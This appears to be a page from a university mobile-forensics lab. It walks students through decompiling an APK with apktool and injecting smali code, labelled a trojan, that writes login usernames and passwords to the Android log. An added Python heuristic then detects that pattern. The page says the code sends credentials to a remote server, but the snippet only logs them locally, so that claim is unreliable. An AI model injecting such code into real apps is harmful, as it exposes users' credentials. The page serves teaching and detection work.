<!DOCTYPE html>
<html class="no-js" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<meta http-equiv="x-ua-compatible" content="ie=edge">
<title>Activity 2 - Mobile Forensics</title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="canonical" href="http://html5-templates.com/">
<link rel="apple-touch-icon" href="apple-touch-icon.png">
<!-- Place favicon.ico in the root directory -->
<link rel="stylesheet" href="style.css">
<script src="js/vendor/modernizr-2.8.3.min.js"></script>
<style type="text/css">
.auto-style1 {
color: #0645AD;
}
</style>
</head>
<body>
<!--[if lt IE 8]>
<p class="browserupgrade">You are using an <strong>outdated</strong> browser. Please <a href="https://browsehappy.com/">upgrade your browser</a> to improve your experience.</p> <![endif]-->
<div class="wrapAll clearfix">
<div class="sidebar" style="left: -21px; top: 32px; width: 10.6em; height: 618px">
<div class="logo"> <a href="index.html"><img src="img/ttu/TTUCS-logo.PNG" alt="logo"></a>
</div>
<div class="navigation">
<ul>
<li><a href="index.html">Main page</a></li>
<!--<li><a href="#">Contents</a></li>
<li><a href="#">Featured content</a></li>-->
</ul>
<br>
<h3>Topics</h3>
<ul>
<li style="width: 155px"><a href="mobile_forensics.html"> Mobile Forensics</a></li>
<li class="auto-style1" style="text-align: center;"><a href="mobile_forensics_activity1.html" style="color: #a72614;">Activity 1</a></li>
<li class="auto-style1" style="text-align: center;"><a href="mobile_forensics_activity2.html" style="color: #a72614;">Activity 2</a></li>
<li class="auto-style1" style="text-align: center;"><a href="mobile_forensics_activity3.html" style="color: #a72614;">Activity 3</a></li>
<li class="auto-style1" style="text-align: center;"><a href="mobile_forensics_activity4.html" style="color: #a72614;">Activity 4</a></li>
<li class="auto-style1" style="text-align: center;"><a href="mobile_forensics_activity5.html" style="color: #a72614;">Activity 5</a></li>
<li style="width: 155px"><a href="#">Malware Analysis</a></li>
<li class="auto-style1"><a href="#">Software Security</a></li>
<li class="auto-style1"><a href="#">Network Forensics</a></li>
<li class="auto-style1"><a href="#">Social Engineering</a></li>
<li class="auto-style1"><a href="#">Reverse Engineering</a></li>
<li class="auto-style1"><a href="#">Content/Threat Analysis</a></li>
</ul>
<!--
<h3>References</h3>
<ul>
<li class="auto-style1"><a href="mobile_forensics_references.html">Mobile Forensics</a></li>
<li class="auto-style1"><a href="#">Malware Analysis</a></li>
</ul>
-->
<br>
<h3>Interaction </h3>
<ul>
<li><a href="contact_us.html">Contact Us</a></li>
<li><a href="about.html">About</a></li>
</ul>
</div>
</div>
<div class="mainsection">
<div class="headerLinks"> <a href="#">Contributions</a>
</div>
<div class="tabs clearfix">
<div class="tabsLeft">
<ul>
<li><a href="#" class="active">Article</a></li>
</ul>
</div>
<div id="simpleSearch"> <input name="searchInput" id="searchInput" placeholder="Search Wikipedia"
size="12"
type="text">
<div id="submitSearch"></div>
</div>
<div class="tabsRight">
<ul>
<li><a href="#" class="active">Read</a></li>
<li><a href="#">View source</a></li>
<li><a href="#">View history</a></li>
</ul>
</div>
</div>
<div class="article">
<h1>Activity 2 - Mobile Forensics</h1>
<p class="siteSub"> </p>
<h3>Re-building the APK File</h3>
<p class="roleNote">Estimated Time: 30 Minutes</p>
<h2>Objective</h2>
<p>In Activity 2, the <a href="https://en.wikipedia.org/wiki/Apk_(file_format)">APK</a> file is extracted to a folder and malicious code is injected into one of the files.</p>
<h2>Description</h2>
<p>
After generating a signed APK file in Activity 1,
we will extract it into a folder structure and inject
malicious code into one of the files. This code
copies the login credentials entered in the app and
sends them to a remote server unnoticed.
</p>
<h2>Artifacts</h2>
<p> Click the links below to download the files.<br>
<a href="img/ttu/Activity2/login.apk" alt="app-release.apk">login.apk</a><br>
<a href="img/ttu/Activity2/p9cert.jks" alt="app-release.apk">p9cert.jks</a></p>
<h2>Instructions</h2>
<p>
<ul>
<li>Step 1: Download the file "apktool_2.0.0rc3.jar" from the link below. With this jar file, we will extract the "app-release.apk" file created in Activity 1 and inspect its contents.</li>
   <a href="https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.0.0rc3.jar">https://bitbucket.org/iBotPeaches/apktool/downloads/apktool_2.0.0rc3.jar</a>
<br>
<br>
<li>Step 2: Place the downloaded file in the same directory as "app-release.apk".</li>
   <img src="img/ttu/Activity2/reference-folder-structure.PNG" width="50%" height="50%">
<br><br>
<li>Step 3: Open a command prompt and go to the folder where the files "apktool_2.0.0rc3.jar" &amp; "app-release.apk" are located.</li>
<br>
<li>Step 4: Run the command below to extract the APK file into a folder structure.</li>
   java -jar apktool_2.0.0rc3.jar d app-release.apk<br>
   <img src="img/ttu/Activity2/APK-Extraction.PNG" width="50%" height="50%">
<br><br>
<li>Step 5: Go into the app-release folder and look at the sub-folders.</li>
<br>
<li>Step 6: The "smali" sub-folder under app-release contains several files with the ".smali" extension.</li>
   <img src="img/ttu/Activity2/app-release-folder.PNG" width="50%" height="50%">
<br><br>
<li>Step 7: Search for the file "RestClient.smali" and open it in any text editor (for example, Notepad++). Then find the method "performLogin" in the code.</li>
<br>
<li>Step 8: Add the code below after ".line 258" in the file.</li>
<br>
<p style="color:blue;">
   # EVIL TROJAN CODE LOGGING PASSWORD<br>
   const-string v0, "TTUPROJECT"<br>
   const-string v1, "USERNAME AND PASSWORD BELOW"<br>
   invoke-static {v0, v1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I<br>
   invoke-static {v0, p3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I<br>
   invoke-static {v0, p4}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I<br>
   # END OF EVIL TROJAN CODE<br>
</p>
<br>
   <img src="img/ttu/Activity2/existing-code.PNG" width="50%" height="50%"><br><br>
   <img src="img/ttu/Activity2/modified-code.PNG" width="50%" height="50%">
<br><br>
<li>Step 9: Save the changes to the "RestClient.smali" file.</li>
</ul>
</p>
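<p>The check below is an added example, not part of the original activity: a heuristic that scans decoded smali for <code>android.util.Log</code> calls that pass a parameter register (such as <code>p3</code> or <code>p4</code>) inside a method whose name suggests credential handling, which is the pattern the Step 8 snippet leaves behind. The sample class name and method signature are constructed for illustration.</p>

```python
import re

# Constructed sample: class name and method signature are assumptions;
# the logging lines are the ones added in Step 8.
SAMPLE_SMALI = r'''
.class public Lcom/example/RestClient;
.method public performLogin(Landroid/content/Context;Ljava/lang/String;Ljava/lang/String;Ljava/lang/String;)V
    .locals 2
    .line 258
    const-string v0, "TTUPROJECT"
    const-string v1, "USERNAME AND PASSWORD BELOW"
    invoke-static {v0, v1}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    invoke-static {v0, p3}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    invoke-static {v0, p4}, Landroid/util/Log;->e(Ljava/lang/String;Ljava/lang/String;)I
    return-void
.end method
.method public getVersion()Ljava/lang/String;
    .locals 1
    const-string v0, "1.0"
    return-object v0
.end method
'''

METHOD_RE = re.compile(r'^\.method\s+.*?([\w<>$]+)\(')
LOG_CALL_RE = re.compile(
    r'invoke-static\s*\{([^}]*)\},\s*Landroid/util/Log;->(\w+)\(')
SENSITIVE_RE = re.compile(r'login|auth|passw|credential', re.IGNORECASE)

def find_param_logging(smali_text):
    """Return (method, line_no, log_level, registers) for each Log call that
    passes a parameter register inside a credential-handling method."""
    findings, method = [], None
    for line_no, raw in enumerate(smali_text.splitlines(), 1):
        line = raw.strip()
        started = METHOD_RE.match(line)
        if started:
            method = started.group(1)
        elif line.startswith('.end method'):
            method = None
        elif method and SENSITIVE_RE.search(method):
            call = LOG_CALL_RE.search(line)
            if call:
                regs = [r.strip() for r in call.group(1).split(',')]
                params = [r for r in regs if re.fullmatch(r'p\d+', r)]
                if params:  # calls using only local registers are not flagged
                    findings.append((method, line_no, call.group(2), params))
    return findings

if __name__ == '__main__':
    for finding in find_param_logging(SAMPLE_SMALI):
        print(finding)
```

<p>Run over every <code>.smali</code> file in the folder produced by Step 4, the same function gives a reviewer a short list of places where method arguments reach the system log.</p>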
<h2>Self-Assessment</h2>
<p>Please complete the following self-assessment over Activity 2.<br>
<a href="Challenge2.html" alt="Start Assessment">Start Assessment</a>
</p>
</div>
<div class="pagefooter"> This page was last edited on 29.07.2017 |
Template by <a href="http://html5-templates.com/" target="_blank" rel="nofollow">HTML5
Templates</a>
<!-- Please leave this link unchanged -->
<div class="footerlinks"> <a href="#">Privacy policy</a> <a href="#">About</a>
<a href="#">Terms and conditions</a> <a href="#">Cookie statement</a>
<a href="#">Developers</a> </div>
</div>
</div>
</div>
<script src="https://code.jquery.com/jquery-1.12.0.min.js"></script>
<script>window.jQuery || document.write('<script src="js/vendor/jquery-1.12.0.min.js"><\/script>')</script>
<script src="script.js"></script>
<link rel="stylesheet" href="AIchat.v1.css" type="text/css" media="screen" />
<script type="text/javascript" src="dependencies.v1.js"></script>
<script type="text/javascript" src="AIchat.v1.js"></script>
</body>
</html>